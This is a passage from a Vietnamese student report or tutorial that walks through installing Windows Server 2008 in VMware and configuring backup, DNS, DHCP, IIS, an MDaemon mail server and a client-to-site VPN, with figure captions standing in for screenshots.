Windows Server 2008 là hệ điều hành Windows Server bảo mật nhất từ trước đến
giờ. Hệ điều hành này đã được củng cố chắc chắn để giúp bảo vệ chống lại hỏng hóc.
Một số công nghệ mới giúp ngăn chặn các kết nối bất hợp pháp tới các mạng, máy chủ,
dữ liệu của bạn và các tài khoản người dùng. Chức năng Network Access Protection
(NAP) giúp đảm bảo rằng những máy tính nào muốn kết nối với mạng của bạn đều phải
tuân thủ chính sách bảo mật của tổ chức. Việc tích hợp công nghệ và nhiều tính năng

-21-
nâng cao khiến các dịch vụ Active Directory trở thành một giải pháp IDA (Identity and
Access - Nhận dạng và Truy cập) tích hợp, hợp nhất và mạnh mẽ. Thêm vào đó, Read-
Only Domain Controller (RODC) và Mã hóa ổ đĩa bằng BitLocker cho phép bạn triển
khai cơ sở dữ liệu AD một cách bảo mật hơn trên khắp các khu vực của văn phòng chi
nhánh.
Tình toán hiệu năng hiệu cao
Lợi ích và các khoản tiết kiệm chi phí của Windows Server 2008 mở rộng tới
Windows HPC Server 2008 để phục vụ cho môi trường tính toán hiệu năng cao (HPC)
của bạn. Windows HPC Server 2008 được xây dựng trên nền Windows Server 2008,
công nghệ 64 bit và có thể mở rộng một cách hiệu quả tới hàng nghìn lõi xử lý với tính
năng có sẵn để cải thiện hiệu suất, và giảm tính phức tạp của môi trường HPC. Windows
HPC Server 2008 cho phép triển khai rộng rãi hơn bằng cách đem tới cho người dùng
cuối những trải nghiệm phong phú và tích hợp, mở rộng từ ứng dụng máy bàn tới các
cụm máy, và bao gồm một bộ trọn vẹn các công cụ triển khai, quản trị và giám sát. Các
công cụ này dễ triển khai, quản lý và tích hợp với hạ tầng CNTT hiện có của bạn.

-22-
3. Quá Trình Làm Việc Và Kiến Thức
3.1. Làm việc với Windows Sever trên môi trƣờng máy ảo VMWare
Hình 3.1.1: Môi trường Máy ảo VMWare.
- VMWare WorkStation là một phần mềm giúp tạo máy ảo.
- Chạy các ứng dụng trên nhiều hệ điều hành bao gồm cả Linux, Windows và nhiều hơn
nữa cùng một lúc trên cùng một máy tính mà không cần khởi động lại.
Giúp đánh giá và kiểm tra hệ điều hành mới, các ứng dụng và các bản vá lỗi trong một
môi trường bị cô lập.
- Củng cố nhiều máy tính chạy các máy chủ web, máy chủ cơ sở dữ liệu, vv vào một máy
tính duy nhất.
- Xây dựng kiến trúc tham khảo để đánh giá trước khi triển khai vào sản xuất. Như việc
trong khi thực hành về máy Windows Server 2008 trên máy ảo để nghiên cứu trước khi
triển khai trên hệ thống thật.

-23-
a. Cài đặt và cấu hình cho máy chủ Windows Sever 2008
Hình 3.1.2: Cấu hình yêu cầu
Các bước cài đặt máy chủ Sever trên môi trường máy ảo VMWare
Hình 3.1.3:
-Mở máy ảo VMWare Workstation
Hình 3.1.4
-Click File => New Virtual Machine…

-24-
Hình 3.1.5
-Xuất hiện hộp thoại New Vitual Machine Wizard  Click Next>.
Hình 3.1.6
Click Installer disc image file (iso) nếu có file ISO và click Browse..  chọn
đường dẫn đến nơi chưa file ISO.Nếu có đĩa Win Server 2008 thì chon
Installer disc.

-25-
Hình 3.1.7
Nhập Windows Product key hoặc để trống rồi Click Next
Hình 3.1.8

-26-
Chọn Location nơi Windows Server sẽ càiđặt vào nơi nào trong ổđĩa .Click Next
Hình 3.1.9
Nhập dung lượng ổ đĩa vào ô maximum disk size khuyến nghị là 40 GB .Click Next

-27-
Hình 3.1.10
Click Finish để tiến hành cài đặt.
Hình 3.1.11
Chọn ngôn ngữ cài đặt và click Next.
Hình 3.1.12
Bấm nút Install now để bắt đầu cài đặt.

-28-
Hình 3.1.13
Nhập product key của phiên bản Windows Server 2008 Enterprise Nếu chưa
muốn kích hoạt Windows vì mục đích kiểm tra hoặc dùng thử, bạn bỏ dấu
chọn ở mục Automatically activate Windows then I’m online và bấm
nút Next.
Hình 3.1.14
Chọn kiểu cài đặt Windows Server 2008 Enterprise (Full Installation).

-29-
Hình 3.1.15
Chọn I accept the license terms và bấm nút Next.
Hình 3.1.16
Chọn Custom (advanced)

-30-
Hình 3.1.17
Chọn phân vùng ổ đĩa cần cài Windows Server 2008 và click Next.
Hình.3.1.18
Chờ cho quá trình cài đặt hoàn tất

-31-
Hình 3.1.19
Trong lần đăng nhập đầu tiên, hệ thống yêu cầu bạn thay đổi mật khẩu ngay
lập tức
Hình 3.1.20
Bạn bấm OK, nhập mật khẩu mới và bấm phím Enter.
Và như vậy bạn đã cài đặt hoàn tất Windows Server 2008.

-32-
b. Khởi tạo cấu hình đầu tiên cho máy chủ Sever 2008
Ngay khi bạn đăng nhập thành công, hệ thống hiển thị màn hình yêu cầu thực hiện các
thao tác cầu hình ban đầu cho Windows (Initial Configuration Tasks). Trong đó bao gồm
:
-Set time zone : thiết lập time zone cho server.
-Configure networking : thiết lập các thông số kết nối mạng bằng cách mở cửa
sổ Network Connections và tương tác với các kết nối hiện có trên server.
-Provide computer name and domain : mở hộp hội thoại System Properties để thay đổi
tên máy tính và kết nối vào domain.
-Enable automatic updating and feedback : kích hoạt tính năng này để cho phép bạn cấu
hình Windows automatic updating, Windows Error Reporting và Customer Experience
Improvement Program.

-33-
Hình 3.1.21: Màn hình Initial Configuration Task
Hình 3.1.22: Kích hoạt tính năng automatic updating and feedback

-34-
-Cài đặt Server Manager
Ngay khi bạn kết thúc các bước cấu hình và đóng màn hình Initial Configuration Tasks,
màn hìnhServer Manager tự động được kích hoạt. Tại đây, bạn có thể thực hiện hầu hết
các thao tác cấu hình trên server.
Hình 3.1.23: Màn hình chính của Server Manager
Server Manager là một công cụ che phép bạn thực hiện hầu hết các thao tác quản
trị trên Windows Server 2008, từ các dịch vụ server như Active Directory, DNS, DHCP,
… đến các thành phần của hệ thống như .NET Framework 3.0, Network Load Balancing,
Group Policy Management, … ; từ hệ thống firewall, quản lý user và group đến các dịch
vụ sao lưu hệ thống, quản lý đĩa…
Có thể nói rằng công cụ này là kết quả của sự kết hợp hòan hảo các công cụ quản
lý trên những phiên bản Windows trước đó.
Theo mặc định, Server Manager sẽ tự động khởi động ngay sau khi bạn đăng nhập
vào hệ thống. Nếu đã đóng cửa sổ này, bạn có thể thực hiện một trong những cách sau để
mở lại :

-35-
-Kích chuột phải vào biểu tượng Computer trên desktop, chọn Manage.
Các thành phần trong Server Manager
Khi làm việc với Server Manager, bạn sẽ tương tác với 5 thành phần chính :
-Roles cho phép bổ sung và loại bỏ các dịch vụ của server. Tại đây bạn cũng có thể
quản lý chi tiết dữ liệu tương ứng với mỗi dịch vụ.
- Features cho phép bổ sung và loại bỏ các thành phần trên Windows Server 2008.
Chức năng này tương tự như Add/Remove Windows Components trong các phiên bản
Windows trước đó.
-Diagnostics tích hợp các thành phần Event Viewer, Reliability and
Performance và Device Manager.
-Configuration bao gồm các công cụ Local Users And Group, Task Scheduler,
Windows Firewall with Advanced Security, WMI Control và Services. WMI Control
được dùng để quản lý các dịch vụ Windows Management Instrumentation.
-Storage tích hợp hai công cụ Windows Server Backup và Disk Management.

-36-
Hình 3.1.24: Quản lý chi tiết trên Active Directory Users and Computer.
Quản lý các dịch vụ Server (Roles)
Để mở các cửa sổ quản lý các dịch vụ server, bạn chọn mục Roles ở khung bên
trái của màn hình Server Manager. Trên Windows Server 2008 nói chung, bạn có thể
triển khai tất cả 16 dịch vụ server, từ Active Directory Domain Services đến các server
như DHCP, DNS, Web, …
Lưu ý : ngoài 16 dịch vụ server có mặt trên tất cả các phiên bản Windows Server
2008, Microsoft còn cung cấp một dịch vụ server nữa, đó là Hyper-V. Hyper-V là công
nghệ ảo hóa chỉ chạy trên các nền tảng hệ điều hành 64-bit.
Để cài đặt một dịch vụ server bất kỳ, bạn đánh dấu chọn vào ô tương ứng trên hộp
thoại Select Server Roles. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến trình cài đặt,
tùy theo đặc điểm riêng của từng dịch vụ server, bạn sẽ điền thông tin và thực hiện các
thao tác cần thiết để hoàn thành tiến trình.

-37-
Hình 3.1.25: Các dịch vụ Server trên Windows Server 2008
Quản lý các thành phần (Features)
Để mở cửa sổ quản lý các thành phần, bạn chọn mục Features ở khung bên trái
của màn hình Server Manager. Trên Windows Server 2008 bạn có thể tương tác với tất
cả 35 thành phần.
Để cài đặt một thành phần bất kỳ, bạn đánh dấu chọn vào ô tương ứng trên hộp
thoại Select Features. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến trình cài đặt, tùy
theo đặc điểm riêng của từng thành phần, bạn sẽ điền thông tin và thực hiện các thao tác
cần thiết để hoàn thành tiến trình.

-38-
Hình 3.1.26: Các thành phần Feature trên Windows Server 2008.
Sau khi cài đặt xong, thông tin và trạng thái của các thành phần sẽ hiển thị trong
khung Features Summary thuộc cửa sổ Server Manager. Tại đây, bạn cũng có thể thực
hiện các thao tác bổ sung và loại bỏ các thành phần này.
Quản lý không gian lưu trữ và sao lưu dữ liệu (Storage) và Backup Server.
Mặc định, Windows Server Backup chưa sẵn dùng trên Windows Server 2008. Do đó,
bạn cần bổ sung thành phần này vào hệ thống trước khi sử dụng. Các bước thực hiện như
sau :

-39-
Hình 3.1.27
Trong màn hình Select Features, đánh dấu chọn mục Windows Server Backup
Features và bấm nút Next.
Hình 3.1.28
Trong màn hình Confirm Insatallation Selection, bạn bấm nút Install để bắt đầu cài đặt.

-40-
Trong màn hình Installation Results, bạn bấm nút Close để hoàn thành thao tác bổ sung
thành phần cần thiết vào Windows Server 2008.
Hình 3.1.29
Kích chuột phải lênh mục Windows Server Backup trong Storage, chọn Backup
Schedule.
Hình 3.1.30

-41-
Trong màn hình Getting started, bấm nút Next.
Hình 3.1.31
Trong màn hình Select backup items, bạn chọn ổ đĩa chứa hệ điều hành của mình, trong
trường hợp này là ổ đĩa C: và bấm nút Next
Trong màn hình Specify backup time, bạn chọn số lần và thời điểm sao lưu. Ở đây,
chúng ta chọn sao lưu vào lúc 10:00 tối mổi ngày (Once a day). Sau khi chọn xong, bạn
bấm nút Next.
Trong màn hình Select destination disk, bạn đánh dấu chọn vào ổ đĩa mà mình sẽ sao
lưu đến và bấm nút Next

-42-
Hình 3.1.31
Trong màn hình Label destination disk, bấm nút Next.
Trong màn hình Summary, bạn bấm nút Finish để hoàn thành thao tác tạo lịch trình sao
lưu ổ đĩa
c. Cài đặt dịch vụ DNS
DNS (Domain Name System) Server là máy chủ được dùng để phân giải
domain thành địa chỉ IP và ngược lại. Ví dụ: athena.edu.vn là
173.214.177.90
Về cách thức hoạt động, DNS Server lưu trữ một cơ sở dữ liệu bao gồm các
bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi máy client gửi yêu cầu
phân giải đến, DNS Server tiến hành tra cứu trong cơ sở dữ liệu và gửi kết
quả tương ứng về máy client.
Hình 3.1.32
Tại cửa sổ Server Manager, chọn mục Roles, chọn mục Add Roles.

-43-
Hình 3.1.33
Chọn DNS và click Next
Hình 3.1.34
Click Next

-44-
Hình 3.1.35
Click Install để cài đặt DNS
Hình 3.1.36
Quá trình cài đặt hoàn tất.
Để cấu hình DNS Server vào menu StartProgramsAdministrative Tools,
chọn DNS.

-45-
Hình 3.1.37: Forward Lookup Zones, chọn New Zone.
Hình 3.1.38: Trong màn hình Welcome, bấm nút Next

-46-
Hình 3.1.39
Trong màn hình Zone Type, bạn chọn Primary zone để cấu hình DNS Server
chính. Sau đó, bấm nútNext.
Hình 3.1.40

-47-
Trong màn hình Zone Name, bạn nhập tên zone vào mục Zone name, ví dụ
athena.edu.vn. Sau đó, bấm nút Next
Hình 3.1.41
Trong màn hình Zonle File, bạn chấp nhận giá trị mặc định và bấm nút Next.
Hình 3.1.42:Để mặc định và click Next

-48-
Hình 3.1.43
Trong màn hình Completing, bạn xem lại thông tin về DNS Server và bấm
nút Finish để hoàn thành thao tác cấu hình DNS.
Với các bước vừa thực hiện ở trên, bạn đã cấu hình chức năng forward, tiếp
theo, bạn sẽ cấu hình chức năng reverse. Reverse Lookup Zones, chọn New
Zone
Hình 3.1.44

-49-
Trong màn hình Welcome, bấm nút Next. Trong màn hình Zone Type, bạn
chọn Primary.Sau đó, bấm nút Next.
Hình 3.1.45
Trong màn hình Reverse Lookup Zone Name, bạn chọn thể loại địa chỉ IP
là Ipv4
Hinh 3.1.46
Tiếp theo, bạn điền network IP của mình và bấm nút Next.

-50-
Hình 3.1.47
Trong màn hình Zone File, bạn chấp nhận giá trị mặc định nhằm tạo ra một file
dùng để lưu các bản ghi DNS cho zone này, bấm nút Next.
Hình 3.1.48
Trong màn hình Dynamic Update, bạn chọn allow dynamic updates và bấm
nút Next

-51-
Trong màn hình Completing, bạn bấm nút Finish để hòan thành thao tác cấu hình chức
năng reverse trên DNS Server chính.
Hình 3.1.49: Cấu hình host đại diện dùng để phân giải tên ra số.
Hình 3.1.50
Mục name nhập www và mục IP address nhập địa chỉ Ip máy Server. Và Click Add host.
Để kiểm tra và start  cmd và gõ lệnh nslookup  192.168.10.10
Tạo Pointer đại diện tên 1 host có sẵn để phân giải tên ra IP.

-52-
Trong hộp thoại New Resource Record, bạn nhập địa chỉ IP vào mục Host IP address,
đồng thời nhập tên máy vào mục Host name. Nếu không nhớ, bạn bấm nút Browse để
tìm ra tên máy cần thiết. Sau khi điền xong, bấm nút OK.
Hình 3.1.51
Sau khi Click Brows đến Sever có địa chỉ 192.168.10.10 Click OK.
d. Dịch vụ DHCP
DHCP (Dynamic Host Configuration Protocol) Server là máy chủ được
dùng để cấp phát địa chỉ IP động cho các máy trạm trong một hệ thống mạng.
Trên các phiên bản trước như Windows 2000 Server hay Windows Server
2003, bạn đã quen thuộc với chức năng này.
Về cách thức hoạt động, DHCP Server sử dụng dịch vụ cùng tên để lắng
nghe yêu cầu xin cấp phát địa chỉ IP được gởi từ máy trạm. Sau khi nhận yêu
cầu, DHCP Server sẽ chọn ra một địa chỉ IP trong dãy địa chỉ của mình và gời
về cho máy trạm. Đồng thời, DHCP Server cũng gởi đến máy trạm các thông
tin liên quan đến địa chỉ IP như subnet mask, địa chỉ IP của các DNS Server,

-53-
default gateway, …Đối với Windows Server 2008, cách thức cài đặt và cấu
hình được mô tả chi tiết ngay sau đây.
Hình 3.1.52
Mở cửa sổ Server Manager. Trong khung Roles Summary ở bên phải, bạn bấm nút Add
Roles

-54-
Hình 3.1.53
Chọn dịch vụ DHCP và click Next
Hình 3.1.54
Click Next

-55-
Hình 3.1.55
Chọn card mạng lắng nghe yêu cầu xin cấp DHCP và click Next
Hình 3.1.56
Nhập thông tin về domain và các DNS Server sau đó click Next.

-56-
Hình 3.1.57
Trong màn hình Specify Ipv4 WINS Server Settings, bạn chọn WINS is not required
for applications on this network. Sau đó click Next.
Hình 3.1.58
Trong màn hình Add or Edit DHCP Scopes, bấm nút Add. Và điền các thông tin cần
thiết. và click OK.

-57-
Hinh 3.1.59
Sau khi hoàn thành việc định nghĩa các dãy địa chỉ, bạn bấm nút Next trong màn hình
Add or Edit DHCP Scopes
Hình 3.1.60
Trong màn hình Configure DHCPv6 Stateless Mode, bạn chọn Disable DHCPv6
stateless mode for this server.

-58-
Hình 3.1.61
Trong màn hình Authorize DHCP Server, bạn chọn tài khoản dùng để cấp phép
(authorizing) cho DHCP Server trong Active Directory Domain Services. Sau đó, bấm
nút Next.
Hình 3.1.62
Trong màn hình Confirm Installation Selections, bạn xem lại các thiết lập vừa thực hiện
và bấm nútInstall để bắt đầu cài đặt.Như vậy chúng ta đã hoàn tất quá trình cài đặt và cấu
hình dịch vụ DHCP.

-59-
Hình 3.1.63
Đến đây, DHCP đã sẵn sàng cung cấp địa chỉ IP cho các máy trạm trong hệ thống mạng.
Nếu muốn hiệu chỉnh các thông số cấu hình, bạn thực hiện theo các bước sau:vào
menu Start/Programs/Administrative Tools, chọn DHCP
Hình 3.1.64
Mở rộng mục IPv4, kích chuột phải vào dòng Scope [172.16.0.0], chọn Properties

-60-
Hình 3.1.65
Trên tab General, bạn có thể thay đổi các giá trị Scope name, Start IP address, End IP
address, giới hạn thời gian địa chỉ IP tồn tại trên máy trạm
Hình 3.1.66
Để thay đổi gateway, bạn kích chuột phải lên mục 003 Router trong Scope Options,
chọnProperties.

-61-
Hình 3.1.67
Thay đổi giá trị gateway bằng các chức năng Add và Remove.
Hình 3.1.68
Để thay đổi địa chỉ các DNS Server, bạn kích chuột phải lên mục 006 DNS
Servers trong Server Options, chọn Properties.

-62-
hình 3.1.69
Thay đổi địa chỉ của DNS Server bằng chức năng Add và Remove.
Hình 3.1.70
bạn kích chuột phải lên mục 015 DNS Domain Name trong Server Options,
chọn Properties.

-63-
Hình 3.1.71Nhập tên miền mới vào mục String value.
Hình 3.1.72
Cấu hình địa chỉ IP động trên máy trạm bạn mở cửa sổ Network Connections và truy cập
vào hộp thoại Internet Protocol (TCP/IP) Properties. Tại đây, bạn chọn Obtain an IP
address automatically và Obtain DNS server address automatically. Sau đó, bấm nút OK

-64-
Hình 3.1.73
Trên máy trạm lệnh xin cấp địa chỉ DHCP bằng cách vào Start  Run  gõ cmd 
enter.
Hình 3.1.74: Gõ lệnh ipconfig /renew.
Hình 3.1.75
Để xin trả lại địa chỉ IP mà DHCP đã cấp gõ lệnh ipconfig / release.
Như vậy chúng ta đã hoàn thành việc cấp địa chỉ IP động bằng dịch vụ DHCP.

-65-
e. Cấu hình Web Sever IIS
Hình 3.1.76
Mở cửa sổ Server Manager. Trong khung Roles Summary ở bên phải, bạn
bấm Add Roles.
Hình 3.1.77
Trong màn hình Select Server Roles, chọn Web Server (IIS)

-66-
Hình 3.1.78
Trong hộp thoại Add features required for Web Server (IIS), bạn bấm nút Add
Required Featuresđể bổ sung các thành phần liên quan đến Web Server.
Hình 3.1.79
Trong màn hình Select Server Roles, bấm nút Next.

-67-
Hình 3.1.80
Chọn lựa các thành phần bổ sung vào Web Server.
Hình 3.1.81
Trong màn hình Confirm Installation Selections, bạn xem lại các thiết lập vừa
thực hiện và bấm nútInstall để bắt đầu cài đặt.

-68-
Hình 3.1.82
Sau khi cài đặt hoàn tất. Khi IIS Manager xuất hiện, bạn sẽ bắt gặp ngay trang
web đầu tiên (IIS Start Page). Tại đây, bạn sẽ tìm thấy thông tin về các kết nối
đến các Web Server mình đã quản lý trong thời gian gần với hiện tại.
Hình 3.1.83
Trong màn hình Specify Server Connection Details, bạn nhập địa chỉ IP của
Web Server cần quản lý vào mục Server name và bấm nút Next.

-69-
Hình 3.1.84
Trong màn hình Specify a Connection Name, bạn nhập tên kết nối và bấm
nút Finish.
Hình 3.1.85
Để thay đổi các thông số cấu hình trên Web Server, bạn kích chọn tên kết nối
tương ứng với Web Server ở khung bên trái, sau đó chọn mục cần cầu hình ở
khung chính giữa.

-70-
Hình 3.1.86
Để kiểm tra Web Server sau khi đã cài đặt, bạn mở trình duyệt và gõ địa
chỉ http://localhost. Nếu màn hình IIS 7 xuất hiện như hình bên dưới, thao tác
cài đặt và cấu hình Web Server của bạn đã thành công.
Hình 3.1.87
Xuất bản một website Mở cửa sổ Internet Information Service (IIS) Manager. Kích
chuột phải lên mục Sites ở khung bên trái, chọn Add Web Site.

-71-
Hình 3.1.88
Trong hộp thoại Add Web Site, bạn điền thông tin :
Tên của website vào mục Site name
Nhập đường dẫn đến thư mục chứa mã nguồn của website vào mục Physical
path hoặc bấm vào nút ba chấm (…) để định đường dẫn.
Nếu xuất bản website với mã nguồn chứa ở một máy tính khác, bạn cần bấm vào
nút Connect as và chỉ định tài khoản dùng để truy cập thư mục ở xa này.Nếu xuất bản
nhiều website, bạn cần nhập tên truy cập chính xác của các website vào mục Host name.

-72-
Hình 3.1.89
Ngay sau đó, một thông báo xuất hiện, cho biết cổng 80 đã được một website
khác sử dụng (thông thường là Default Web Site) Trong trường hợp này, bạn
cần kích chọn Default Web Site và bấm nút Stop ở khung bên phải để ngưng
trạng thái hoạt động của website này. Đồng thời, bạn chọn website của mình và
bấm nút Start ở khung bên phải để kích hoạt trạng thái hoạt động cho website
Đến nay, bạn đã hoàn thành thao tác xuất bản một website. Nếu muốn kiểm tra,
bạn mở trình duyệt và gõ địa chỉ http://localhost. Ngay sau đó, nội dung
website của bạn sẽ xuất hiện.
f. Mail Sever
Hiện nay có rất nhiều phần mềm quản lý Mail trên Server như: Mail
Exchange,… nhưng MDaemon Mail Server: là 1 trong những giải pháp hệ thống
mail server toàn diện nhất hiện nay dành cho các công ty, doanh nghiệp với quy
mô khác nhau. MDaemon Mail Server hiện có 3 phiên bản: Standard, Pro và
Free. Sau đây là một số điểm đáng chú ý của chương trình.

-73-
Hình 3.1.90:Giao diện Mdeamon.
Màn hình hiển thị chính của MDaemon (Graphical User Interface - GUI) đưa ra
thông tin quan trọng về các nguồn tài nguyên, các giao dịch, số liệu thống kê, luồng dữ
liệu đang trong trạng thái hoạt động (active) và các mail đang trong quá trình chờ đợi
(queued) để được xử lý. Bên cạnh đó, còn có sự lựa chọn cho người dung chuyển đổi
trạng thái activating/deactivating đối với các hệ thống máy chủ khác nhau có sử dụng
MDaemon. Cửa sổ bên phải hiển thị đầy đủ thông tin về kết nối dữ liệu đầu vào và ra
(incoming và outgoing) đang được thực hiện.

-74-
Sau đây là quá trình cài đặt 1 Mail Server trên phần mềm Mdeamon.
Hình 3.1.91
Trước tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt đầu quá trình cài
đặt.Bấm "Next" để tiếp tục.
Hình 3.1.92
Đánh dấu vào ô "I have read and I agree with all the terms of this license
agreement"

-75-
Hình 3.1.93
Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa
có cài hệ điều hành Microsoft Windows).
Hình 3.1.94
Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới.
Ở ví dụ sử dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.

-76-
Hình 3.1.94
Tùy chọn các thông tim phù hợp với vị trí, ở đây là VietNam
Hình 3.1.95
Điền đúng thông tin về quy mô của tổ chức hoặc công ty.
Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt.

-77-
Hình 3.1.96
Điền tên Domain ví dụ : Athena.edu.vn
Hình 3.1.97
chính (Primary) và dự phòng (Backup) Điền địa chỉ DNS

-78-
Hình 3.1.98
Giữ nguyên lựa chọn "Setup MDaemon as a system service"
Hình 3.1.99
Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử
dụng

-79-
Hình 3.1.100
Giao diện sau khi cài đặt thành công.
Hình 3.1.101
Tạo 1 tài khoảng mới vào Account  New Account…

-80-
Hình 3.1.102
Nhập thông tin vào Email address và Email Password. Click OK để tạo tài khoảng Email.
Hình 3.1.103
Vào OutLook Mail.

-81-
Hình 3.1.104
Cấu hình Out Look mail để quán lý mail cho tài khoảng .Nhập tên hiện thị
vào Display name và click Next>
Hình 3.1.105
Nhập địa chỉ Email và Click Next>

-82-
Hình 3.1.106
Nhập địa chỉ IP vào 2 ô Incoming và Outgoing và click Next.
Hình 3.1.107
Nhập tên tài khoảng và mật khẩu. Click Next

-83-
Hình 3.1.108
Click Finish để hoàn tất cấu hình quản lý mail cho tài khoản
Tương tự tạo một tài khoản khác để tiến hành gửi Mail giữa 2 tài khoản
VD: huynhphuong@athena.edu.vn

-84-
Hình 3.1.109
Tạo mail để kiểm ra việc gửi mail từ tài khoảng test đến 1 e mail bất kỳ.
Hình 3.1.110
Đã nhận được Mail từ huynhuong@athena.edu.vn

-85-
Hình 3.1.111
Sau đó tiến hành reply cho huynhhuong@athena.edu.vn
Hình 3.1.112
Nhận mail thành công giữa hai User
Như vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên
phần mềm Mdeamon.

-86-
g. Kết nối VPN
Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần phải
làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những người dùng
truy cập từ xa có thể được định danh và xác thực; các được hầm có thể được
tạo lập, duy trì và quản lý cho hàng trăm người dùng; việc định tuyến có thể
kiểm soát tất cả luồng lưu lượng qua Gateway, và trong khi tất các những thứ
này đang tiếp tục, hiệu suất và sự an toàn cần được duy trì.
Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng ảo
hoạt động đúng đắn. Để đưa ra quyết định đúng lúc triển khai các kết nối
mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần liên quan.
Trong chương "Tổng quan về mạng riêng ảo" chúng ta đã thảo luận về kiểu
kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều Client truy cập tới một
cổng kết nối đơn vào các tài nguyên trong mạng Intranet. Trong phần này ta
sẽ mô tả các thành phần của các kết nối mạng riêng ảo truy cập từ xa và các
quan điểm thiết kế gắn với chúng.
Mô hình VPN Client to Site:
Hình 3.1.113 Mô hình VPN Client to site

-87-
Hình 3.1.114
Đăng nhập vào máy chủ ảo VPS với quyền quản trị.
Hình 3.1.115
Vào Start  Programs  Administrative Tools  Routing and remote access
để cấu hình.

-88-
Hình 3.1.116
Giao diện Routing and remote Access
Hình 3.1.117
Click chuột phải vào server bà chọn Configure and Enable Routing and
Remote Access.

-89-
Hình 3.1.118
Cửa sổ Routing and remote access server setup wizard hiện lên ta Click Next
Hình 3.1.118
Ta chọn Custom Configutation.

-90-
Hình 3.1.119
Đánh dấu vào 2 mục VPN access và mục Lan routing.Click Next.
Hình 3.1.120
Click Finish để tiến hành kích hoạt.

-91-
Hình 3.1.121
Click Yes để bắt đầu.
Hình 3.1.122
Routing and Remote Acces đã sẵn sàng.

-92-
Hình 3.1.123
Để cấu hình dãy địa chỉ IP khi các máy Client truy cập vào VPN sẽ được cấp ta right
click vào Server và chọn Properties.
Hình 3.1.124
Chuyễn sang tab IP và chọn Static andress pool.

-93-
Hình 3.1.125
Nhập dãy địa chỉ bắt đầu vào Start IP address và dãy địa chỉ kết thúc vvào End IP address
và Click OK để chấp nhận.
Hình 3.1.126
Như vậy chúng ta đã hoàn tất cấu hình cho phép có thể truy cập VPN vào máy chủ. Tiếp
theo ta cần tào tài khoảng để có thể đăng nhập vào máy chủ. Bằng cách Right click vào
My conputer và chọn Manage.

-94-
Hình 3.1.127
Tiếp theo ta vào System tools  Local Users and Groups  Users
Hình 3.1.128
Right Click vào User và chọn New User…

-95-
Hình 3.1.129
Tạo 1 user và điền tên user vào mục User name và mật khẩu vào ô Password và nhập lại
mật khẩu vào ô Confim password. Click Create để tạo user.
Tương tự ta tạo thêm một user 2 có tên là Client 2

-96-
Hình 3.1.130
Để User có quyền truy cập VPN ta right click vào tài khoảng cần cấp quyền và chọn
Properties

-97-
Hình 3.1.131
Sang tab Dial-in và chọn Allow Access để cấp quyền và click OK để hoàn tất. Tương tự
cho user có tên là Client2.
Hình 3.1.132
Chuẩn bị 2 máy ảo. Trên máy ảo thứ 1 ta vào Start Settings  Network Connections.

-98-
Hình 3.1.133
Click vào Create a new Connection
Hình 3.1.134
Hộp thoại New Connection Wizard hiện lên và click Next

-99-
Hình 3.1.135
Chọn mục Connect to the Network at my workplace và click Next
Hình 3.1.36
Click chọn Virual Private Network connection và chọn Next

-100-
Hình 3.1.137
Nhập tên công ty vào ô company name và click Next
Hình 3.1.138
Click Do not dial the intial connection và click Next

-101-
Hình 3.1.139
Nhập địa chỉ IP của máy chủ hoặc tên domain đã đăng ký và click Next
Hình 3.1.140
Chọn Anyone’s use và click Next

-102-
Hình 3.1.141
Chọn add a shortcut to this connection to my desktop để thuận tiện cho lần kết nối sau và
click Finish để hoàn tất.
Hình 3.1.142
Màn hình đăng nhập hiện lên ta nhập tên User và Password cần kết nối và click Connect.

-103-
Hình 3.1.143
Sau khi kết nối thành công thì bên góc phải màn hình sẽ có kết nối mạng thứ 2
Hình 3.1.144
Double click vào biểu tượng mạng kết nối  chuyển sang tab Details để xem chi tiết.

-104-
Hình 3.1.145
Các bước thực hiện tương tự cho Client 2. Và kết quả cho Client 2 như sau.
Trên Client1 tiến hành ping đến địa chỉ Clien2.
Và trên Client 2 ping đến địa chỉ Clien1.

-105-
Hình 3.1.148
Trên Clien1 tiến hành share 1 folder cho Clien 2. Bằng cách tạo 1 folder  right click
chọn properties  tab sharing  chọn Share this folder  click OK.
Hình 3.1.149
Trên Client 2 vào Start  run  gõ //địa chỉ client 2 và click OK.

-106-
Hình 3.1.150
Đã thấy được thư mục mà Client 1 đã share.
Như vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.
3.2. Làm việc với Windows Sever 2008 trên máy chủ ảo VPS
a. Giới thiệu về Máy chủ ảo VPS
VPS theo lưu lượng là loại hình máy chủ VPS tiện dụng, phù hợp & đem
lại nhiều lợi ích, hiệu quả cho các khách hàng mong muốn có một máy chủ
riêng với chi phí CỰC THẤP.
VPS là dịch vụ máy chủ chạy dưới dạng chia sẻ từ 1 tài nguyên server
chính hoạt động như một Dedicated Server. Người quản trị (khách hàng) có
quyền cao nhất để toàn quyền quản trị Server.
VPS kết nối Internet với 01 IP tĩnh và được cài đặt sẵn hệ điều hành tùy
chọn. VPS quản trị từ xa và cài đặt các phần mềm theo nhu cầu mà không bị
giới hạn số lượng domain.
VPS thích hợp cho việc xây dựng hệ thống Mail Server, Web Server,
Backup/Storage Server... dùng riêng hoặc truyền tải file dữ liệu giữa các chi
nhánh với nhau một cách dễ dàng, nhanh chóng thuận tiện và bảo mật.
VPS dễ dàng nâng cấp tài nguyên mà không cần trang bị phần cứng máy
chủ giảm tối đa chi phí.
VPS dễ dàng tái tạo lại hệ điều hành khi gặp sự cố hệ thống với thời gian
thực hiện rất nhanh mà hoàn toàn không cần cài đặt lại từ đầu.

-107-
VPS như một giải pháp dung hòa giữa Web Hosting và Dedicated Server
theo cả nghĩa chi phí và cách thức vận hành, vì vậy đây là giải pháp phù hợp
